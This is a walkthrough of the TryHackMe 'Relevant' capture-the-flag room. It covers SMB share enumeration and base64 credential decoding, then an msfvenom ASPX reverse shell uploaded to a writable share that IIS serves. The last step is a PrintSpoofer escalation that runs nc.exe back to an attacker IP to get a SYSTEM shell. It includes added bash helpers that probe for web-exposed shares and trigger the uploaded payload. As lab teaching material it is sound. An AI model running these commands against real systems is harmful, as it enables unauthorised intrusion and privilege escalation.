TryHackMe: Relevant Made Easy (Walkthrough & Video)


How I Hacked a Win Server Using Printspoofer


CHALLENGE OVERVIEW

  • Link: https://tryhackme.com/room/relevant
  • Difficulty: Medium
  • Target: User/root flags
  • Highlight: Using printspoofer to privilege escalate to the admin account
  • Tools used: nmap, dirb, smbmap, smbclient, base64, msfvenom, netcat, PrintSpoofer
  • Tags: Security, Security Misconfiguration, Pentest, blackbox

BACKGROUND

This is another blackbox-style CTF challenge.


We go into the pentest without any prior knowledge of our target. We are only provided the IP address and will need to do our own enumeration to learn more about our target, and then we’ll move on to planning and executing our attack.

ENUMERATION/RECON

Here are some of the most notable results from our initial enumeration scans.

Nmap results:

It is curious that there are two open ports running HTTP servers (Microsoft IIS). We would be wise to follow up on this finding with dirb scans on both ports to check for hidden directories; a directory that shows up on one port and not the other is worth a closer look.

The name Relevant also pops up on port 3389. This may be important, considering the name of this challenge.

Smbmap

Using smbmap we are able to list four shares along with the permissions our session has on each of them.

We’ll proceed by connecting to the nt4wrksv share because smbmap reports READ, WRITE on it, and since smbmap listed the permissions without us supplying any credentials, the share should not need a password either.

We found a passwords.txt file here that holds two base64-encoded strings. Base64 is an encoding, not encryption, so there is no key to recover: we can decode the strings directly.

We can use the command:

echo "<encoded string>" | base64 -d

We have decoded two username and password combos from these strings. These may come in handy later on in our hack.
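The decode step above, as an added example that is not part of the original walkthrough: a small bash script that decodes every line of a credentials file copied off an SMB share. The point it adds is a caveat that bites in practice: files written on Windows carry CRLF line endings, and the trailing carriage return makes base64 -d reject the line, so the script strips it first and skips anything that does not decode cleanly. The sample file contents are constructed for illustration and are not the strings from the real share.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough: decode every line of a
# passwords.txt pulled from an SMB share. Files written on Windows usually
# end lines with CRLF, and a stray '\r' makes `base64 -d` reject the line,
# so the carriage return is stripped before decoding.

# decode_b64_line STRING -> prints the decoded text; returns non-zero if
# STRING is blank or not valid base64 (`base64 -d` is strict about input).
decode_b64_line() {
    local line
    line=$(printf '%s' "$1" | tr -d '\r')
    [ -n "$line" ] || return 1
    printf '%s' "$line" | base64 -d 2>/dev/null
}

# decode_password_file FILE -> one "decoded<TAB>original" line per valid
# entry, skipping anything that does not decode. Returns 0 if at least one
# line decoded, 1 otherwise.
decode_password_file() {
    local line decoded found=1
    while IFS= read -r line || [ -n "$line" ]; do
        if decoded=$(decode_b64_line "$line"); then
            printf '%s\t%s\n' "$decoded" "$(printf '%s' "$line" | tr -d '\r')"
            found=0
        fi
    done < "$1"
    return "$found"
}

# Constructed sample standing in for the passwords.txt on the share: two fake
# "user - password" strings, base64-encoded and written with CRLF endings,
# plus one line of junk. The real contents of the file are not reproduced.
sample_file=$(mktemp)
trap 'rm -f "$sample_file"' EXIT
{
    printf '%s\r\n' "$(printf 'alice - Summer2024!' | base64)"
    printf '%s\r\n' "$(printf 'bob - Winter2024?' | base64)"
    printf 'not base64 at all!!\r\n'
} > "$sample_file"

decode_password_file "$sample_file"
```

Pipe the real file through the same function after pulling it with smbclient; if a line that looks like base64 is rejected, check for a carriage return or a missing = padding before assuming it is not base64.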

Another interesting finding is that the web server exposes a /nt4wrksv/ directory that mirrors the //10.10.5.113/nt4wrksv SMB share we have write access to. This means a file we put on the share can be requested over HTTP, and since IIS executes server-side pages, we can use this to throw a reverse shell.

We’ll use the rev.aspx file that I previously created with msfvenom.

We are choosing aspx for the format because we know that our server is running Microsoft IIS httpd, and IIS compiles and executes .aspx (ASP.NET) pages server-side when they are requested, so simply loading the file runs our payload.

You can build your own rev.aspx for spawning a reverse Windows shell with the following command (LHOST is your attacking IP, LPORT the port your listener will use):

msfvenom -p windows/shell_reverse_tcp LHOST=<your IP> LPORT=<your port> -f aspx > rev.aspx

UPLOAD THE REV.ASPX PAYLOAD

After uploading the rev.aspx payload with smbclient (connect with smbclient -N //<targetIP>/nt4wrksv, then put rev.aspx at the smb: \> prompt), we’ll set up a netcat listener on the port we baked into the payload:

nc -lnvp 3333

We can trigger the revshell now by loading in our browser:

http://<targetIP>/nt4wrksv/rev.aspx

And now we have our initial foothold!
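The upload-and-trigger procedure above, as an added example that is not part of the original walkthrough. This bash script generalises the step the write-up does by hand: given the share names smbmap returned and the HTTP ports nmap found, it probes which share names also exist as directories under the IIS web root, builds the URL for the uploaded .aspx, and requests it. The target address, the port list, the share list and the stubbed HTTP answers used when running it offline are assumptions for illustration; against a live box the probe uses curl.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough. Given the share names
# smbmap returned and the HTTP ports nmap found, work out which shares IIS
# also serves as web directories, then build the URL that makes IIS execute
# an uploaded .aspx. Target, ports, share list and the stub HTTP answers are
# assumptions for illustration.

# http_status URL -> prints the HTTP status code for URL ("000" if no answer).
# The probe command is overridable through $HTTP_PROBE so the share-matching
# logic can be exercised without a live target.
http_status() {
    "${HTTP_PROBE:-curl_status}" "$1"
}
curl_status() {
    curl -s -o /dev/null -m 5 -w '%{http_code}' "$1"
}

# web_exposed_shares TARGET "PORT ..." "SHARE ..."
# Prints "port share" for every share name that exists as a directory under
# the web root on that port. IIS answers 403 for a real directory that has
# no default document and listing disabled, 200 if listing is enabled, and
# 404 if the path does not exist; only the first two count as a hit.
web_exposed_shares() {
    local target=$1 ports=$2 shares=$3 port share code
    for port in $ports; do
        for share in $shares; do
            # Administrative shares (ADMIN$, C$, IPC$) are never web roots.
            case "$share" in *'$') continue ;; esac
            code=$(http_status "http://$target:$port/$share/")
            case "$code" in 200|403) printf '%s %s\n' "$port" "$share" ;; esac
        done
    done
}

# payload_url TARGET PORT SHARE FILE -> URL to request once FILE has been
# `put` into SHARE over SMB.
payload_url() {
    printf 'http://%s:%s/%s/%s\n' "$1" "$2" "$3" "$4"
}

# trigger_payload URL -> request the page. IIS compiles and runs the .aspx,
# the reverse shell connects back to the listener, and the HTTP response
# never completes, so a short timeout is expected and not an error.
trigger_payload() {
    curl -s -m 3 -o /dev/null "$1" || true
}

# Against a live target the order is: build, upload, listen, probe, trigger.
#   msfvenom -p windows/shell_reverse_tcp LHOST=10.6.2.23 LPORT=3333 -f aspx > rev.aspx
#   smbclient -N //10.10.5.113/nt4wrksv -c 'put rev.aspx'
#   nc -lnvp 3333                       # in a second terminal, before triggering
#   web_exposed_shares 10.10.5.113 "80" 'ADMIN$ C$ IPC$ nt4wrksv'
#   trigger_payload "$(payload_url 10.10.5.113 80 nt4wrksv rev.aspx)"
```

Run the probe with every HTTP port nmap reported, not just 80: a share can be mapped into one IIS site and not another, and a 404 on one port says nothing about the other. Start the listener before triggering; the shell connects back immediately when the page is compiled.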

Next, let’s do an nmap --script vuln scan to drill in on more details about potential vulnerabilities on the target machine.

Our nmap --script vuln scan turns up ms17-010, indicating that our target machine is vulnerable to the famous EternalBlue exploit.

INITIAL FOOTHOLD

Running whoami /priv reveals that SeImpersonatePrivilege is enabled. This privilege lets our process impersonate a client that connects to it, and service accounts such as the IIS application pool identity hold it by default. Let’s keep this in mind as a possible plan B for our attack vector: we might be able to use the PrintSpoofer exploit, which abuses exactly this privilege to obtain a SYSTEM token.
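The check above, as an added example that is not part of the original walkthrough: a bash script that reads saved whoami /priv output (copy it out of the foothold shell into a file on the attacking machine) and reports whether the privileges PrintSpoofer-style escalations depend on are Enabled. The sample output is constructed to resemble an IIS application pool account and is not the real output from the target; the privilege names are the real Windows ones.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough: read saved `whoami /priv`
# output and report which token-impersonation privileges are Enabled, which
# is the precondition PrintSpoofer-style escalations rely on. The sample
# output below is constructed to look like an IIS application pool account;
# the privilege names are the real Windows ones.

# impersonation_privs FILE -> prints "<privilege> <state>" for the two
# privileges that matter (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege)
# and returns 0 if at least one of them is Enabled, 1 otherwise. Output copied
# from a Windows shell carries CRLF line endings, which are stripped first.
impersonation_privs() {
    tr -d '\r' < "$1" | awk '
        $1 == "SeImpersonatePrivilege" || $1 == "SeAssignPrimaryTokenPrivilege" {
            print $1, $NF
            if ($NF == "Enabled") found = 1
        }
        END { exit(found ? 0 : 1) }'
}

# privesc_advice FILE -> one line saying whether PrintSpoofer is worth trying.
privesc_advice() {
    if impersonation_privs "$1" >/dev/null; then
        echo "impersonation privilege enabled: try PrintSpoofer"
    else
        echo "no impersonation privilege: look elsewhere (services, ms17-010, creds)"
    fi
}

# Constructed sample of `whoami /priv` as a low-privileged service account
# would show it, saved with CRLF endings like a real copy from the target.
priv_file=$(mktemp)
trap 'rm -f "$priv_file"' EXIT
printf '%s\r\n' \
'PRIVILEGES INFORMATION' \
'----------------------' \
'' \
'Privilege Name                Description                               State' \
'============================= ========================================= ========' \
'SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled' \
'SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled' \
'SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled' \
'SeImpersonatePrivilege        Impersonate a client after authentication Enabled' \
'SeCreateGlobalPrivilege       Create global objects                     Enabled' \
> "$priv_file"

impersonation_privs "$priv_file"
privesc_advice "$priv_file"
```

The state column is what matters: whoami /priv lists every privilege the token holds, and only the ones marked Enabled are usable as-is. Keying on the last field rather than on fixed column widths keeps the check working when the Description column is localised or reflowed.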

LOCAL RECON

c:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fd—--------omitted—-------------45}

PRIVILEGE ESCALATION

Our nmap --script vuln scan revealed a vulnerability to EternalBlue (ms17-010).

I tried setting up the Python script from Exploit-DB and wasn’t successful. If this were a real pentest, I would definitely do further investigation into the exploit and try using the Metasploit EternalBlue module. For now, let’s go to plan B – the PrintSpoofer exploit.

PLAN B – USING PRINTSPOOFER TO GAIN ADMINISTRATIVE AUTHORITY

👉 Link: https://github.com/itm4n/PrintSpoofer

PrintSpoofer needs two things on the target: the PrintSpoofer.exe binary itself and a command for it to run as SYSTEM. We upload PrintSpoofer.exe and a copy of nc.exe to the writable share the same way we uploaded rev.aspx, start a fresh netcat listener on our machine (use a different port if 3333 is still tied up by the first shell), and from the directory where the two files landed run:

.\PrintSpoofer.exe -c ".\nc.exe 10.6.2.23 3333 -e cmd"

The -c flag tells PrintSpoofer which command to execute with the impersonated SYSTEM token; here that is a netcat connect-back to our listener at 10.6.2.23 with cmd attached. When the listener catches the connection, whoami reports NT AUTHORITY\SYSTEM, which outranks the Administrator account, so we now have full control of the box.

POST-EXPLOITATION

Let’s grab the root flag from the usual directory, C:\Users\Administrator\Desktop\root.txt.

FINAL THOUGHTS

There are probably several ways to solve this box, but this is the one that seemed most natural to me.

Some information we learned during enumeration ended up being irrelevant to our attack vector. I guess the lesson here is to look for viable ways forward and not to dwell for too long on extra information, such as the base64-encoded passwords or the EternalBlue vulnerability that didn’t seem to work for privilege escalation.

Again, the simpler solution proved to be the better solution.